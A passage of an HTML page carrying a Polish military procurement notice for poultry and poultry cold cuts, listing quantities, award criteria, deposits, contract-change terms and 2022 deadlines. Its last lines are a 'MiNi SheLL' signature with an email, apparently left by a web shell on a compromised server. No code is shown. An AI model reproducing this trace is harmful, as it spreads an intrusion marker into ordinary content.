130<br/>ul. Łęczycka 10-12	Grupa Zabezpieczenia 21 WOG Braniewo, <br/>ul. Sikorskiego 41	Grupa Zabezpieczenia 21 WOG Bartoszyce, <br/>ul. Wojska Polskiego 4	Grupa Zabezpieczenia 21 WOG Morąg, <br/>Al. Wojska Polskiego 16	<br/>1	2	3	4	5	6	7	8<br/>1. Noga z kurczaka mrożona	kg	60	60	60	60	240<br/>2. Noga z kurczaka	kg	150	150	150	150	600<br/>3. Filet z piersi kurczaka mrożony	kg	60	60	60	60	240<br/>4. Filet z piersi kurczaka	kg	150	150	150	150	600<br/>5. Filet z piersi indyka mrożony	kg	60	60	60	60	240<br/>6. Filet z piersi indyka	kg	120	120	120	120	480<br/>7. Filet z piersi kaczki	kg	15	15	15	15	60<br/>8. Skrzydełka z kurczaka	kg	90	90	90	90	360<br/>9. Wątroba z kurczaka	kg	90	90	90	90	360<br/>10. Żołądki kurczaka	kg	90	90	90	90	360<br/>11. Kabanosy drobiowe	kg	75	75	75	75	300<br/>12. Kiełbasa szynkowa drobiowa	kg	90	90	90	90	360<br/>13. Parówki z fileta z kurczaka	kg	90	90	90	90	360<br/>14. Szynka drobiowa	kg	75	75	75	75	300<br/>15. Szynka z indyka	kg	90	90	90	90	360<br/>16. Mortadela drobiowa	kg	90	90	90	90	360<br/><br/>Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Szczegółowe ilości maksymalne zostały określone w Opisie Przedmiotu Zamówienia i Formularzu Cenowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15114000-0 - Podroby</p> <p class="mb-0">15112300-9 - Wątróbki drobiowe</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu<br/>tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji<br/>asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla<br/>danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant dostaw - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant dostaw”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>• 0 pkt za WARIANT I – dostawy w każdy wtorek i czwartek(w przypadku, gdy <br/>w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 20 pkt za WARIANT II – dostawy w każdy wtorek, czwartek i piątek <br/>(w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa w poprzednim dniu roboczym)<br/>• 40 pkt za WARIANT III – dostawy w każdy poniedziałek, wtorek, czwartek <br/>i piątek (w przypadku, gdy w ww. dzień wypada dzień świąteczny dostawa <br/>w poprzednim dniu roboczym)<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/><br/>UWAGA:<br/>1) Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>2) W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt.<br/>3) Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty;<br/>4) Dostawy do magazynów Zamawiającego w godz. 8:00-13:30, w piątek 8:00-12:00.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych<br/>nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji<br/>lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w ust. 1 pkt 1), dokument lub dokumenty wystawione w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być<br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 1 pkt 2), zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w<br/>terminie wskazanym w ust. 1 pkt 2).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych,<br/>Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca<br/>udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ.<br/>Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być<br/>wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub<br/>uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od wykonawców wyjaśnień<br/>dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający nie ogranicza rodzaju przedmiotowych środków dowodowych. W szczególności<br/>mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 1 700,00 PLN;<br/>b) dla części zamówienia nr 2 – 500,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp potwierdzającego brak podstaw wykluczenia na<br/>podstawie art. 108 ust 1 oraz art. 109 ust 1 pkt 4), 5), 7) ustawy Pzp - składa każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają<br/>brak podstaw wykluczenia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za<br/>najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej<br/>za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje wprowadzenie zmian postanowień umowy dotyczące:<br/>1)	zmiany ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień w przypadkach, których nie można było przewidzieć w dniu zawarcia umowy, <br/>(w szczególności zmiany stanów osobowych, restrukturyzacji Sił Zbrojnych, zmiany obowiązujących aktów prawnych w zakresie uprawnień do wyżywienia żołnierzy). Wartością końcową umowy będzie wówczas wartość faktycznie zrealizowanych dostaw, z zastrzeżeniem, że wartość umowy nie może być mniejsza od kwoty określonej w § 2 ust. 4 i nie przekroczy kwoty określonej w § 2 ust. 2 (odpowiednio od części zamówienia). <br/>2)	zmiany w ilości środków spożywczych dostarczanych do wskazanego miejsca odbioru (zmniejszenie lub zwiększenie), zmianę danego środka spożywczego dla wskazanego miejsca odbioru na inny, który nie był przewidziany dla tego miejsca, lecz jest objęty umową. O zmianie tej Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem podając zakres zmian, a Wykonawca zobowiązany jest do przyjęcia powyższego do realizacji. Jeżeli wystąpi znaczna liczba zmian – nie później niż do 10 każdego następnego miesiąca Zamawiający dokona analizy realizacji umowy w związku ze zmianami i opracuje w tym zakresie aneks do umowy.<br/>3)	zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT.<br/>4)	zmiana sposobu spełniania świadczeń w sytuacji, gdy nastąpi zmiana przepisów prawnych mających wpływ na wykonanie przedmiotu zamówienia.<br/>5)	wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-23 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-23 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia:<br/>• dla części zamówienia nr 1 – od dnia zawarcia umowy do 31.12.2022 r.;<br/>• dla części zamówienia nr 2 – od dnia zawarcia umowy do 31.12.2022 r.;

Creat By MiNi SheLL
Email: jattceo@gmail.com